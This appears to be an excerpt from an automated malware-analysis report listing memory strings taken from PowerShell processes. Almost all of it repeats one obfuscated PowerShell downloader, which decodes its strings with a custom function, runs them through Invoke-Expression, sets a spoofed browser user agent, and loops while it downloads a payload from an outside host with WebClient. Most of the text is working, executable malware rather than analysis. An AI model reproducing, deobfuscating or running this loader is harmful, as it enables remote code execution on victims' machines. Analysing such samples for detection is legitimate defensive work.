eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe Kd$,iGtieFur KmNoaFonWai.ueKusF.
Source: powershell.exe, 00000002.00000002.2361305747.0000020B5C9DC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2197526043.00000000049FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ,o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt
Source: powershell.exe, 00000005.00000002.2196688153.0000000002BDA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2196688153.0000000002B9E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2196688153.0000000002B0A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2196941349.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2197275382.0000000004690000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exeIf (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT i
Source: powershell.exe, 00000002.00000002.2361305747.0000020B5CFED000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ure) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe Kd$,iGtieFur KmNoaFonWai.ueKusF.)La ') ;Sloshily (Indband
Source: powershell.exe, 00000005.00000002.2196688153.0000000002B3D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Microsoft.PowerShell.ConsoleHost, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msilIndbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe Kd$,iGtieFur KmNoaFonWai.ueKusF.)
Source: powershell.exe, 00000002.00000002.2489622695.0000020B74A20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: .il sorhblia kln,: ag vn,uachv,oeder.hi.ee .t es =kan.cev.w e-lrou,b ojtre,ocprt tst ybls ttg.e fmkr.slna.e.kt.e.mdw etrbdrcinlsoiajeovngyt');$lnindeholde+=$arninge[1];sloshily ($lnindeholde);sloshily (indbandtes 'fo$ung fn gac,vfleafrraiadeprt,hs s.krhadedea
Source: powershell.exe, 00000002.00000002.2490651768.0000020B74B9E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde)
Source: powershell.exe, 00000005.00000002.2197526043.00000000049FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(K
Source: powershell.exe, 00000002.00000002.2361305747.0000020B5C7B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe Kd$,iGtieFur KmNoaFonWai.ueKusF.
Source: powershell.exe, 00000005.00000002.2202717320.00000000073F7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: +%SystemRoot%\System32\mswsock.dllt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.er.slNA.e.kt.E
Source: powershell.exe, 00000002.00000002.2361305747.0000020B5CFD7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2361305747.0000020B5CFED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2361305747.0000020B5CFCA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt 